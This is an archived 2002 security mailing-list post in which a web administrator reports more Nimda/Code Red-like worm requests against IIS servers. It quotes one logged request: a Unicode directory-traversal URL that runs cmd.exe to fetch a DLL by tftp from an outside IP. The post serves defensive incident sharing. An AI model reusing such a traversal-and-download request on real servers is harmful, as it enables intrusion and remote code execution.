Increase in Nimda/Code Red Variants - New Requests Made

From: Joshua_Hillerat_private
Date: Tue Feb 26 2002 - 18:10:59 PST

    I am also seeing an upsurge in Nimda-Like exploit requests.

    This is just one example.

    http://www.myserver.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%2065.19
    7180.98%20GET%20cool.dll%20c:\httpodbc.dll.

    Users IP : 65.197.180.98

    New DLL's are showing up in these requests, although the methods of
    execution remain the same.  Perhaps someone has thrashed another core
    IIS/Win32 dll and is attempting to exploit?  Pretty sure httpodbc.dll is in
    use by IIS and my ODBC connections. (Correct me if I'm wrong ... ;))

    Another thing I've noticed is the number of requests per IP has gone up.
    Usually I'd get about 20 - 30 requests, now I'm receiving anywhere between
    50 and 80 from the infected host.

    It does still appear to be automated / worm activity.

    Just thought I'd let the lists know. ;-)

    Joshua Hiller
    Manager Web Operations
    AeA
    Advancing the Business of Technology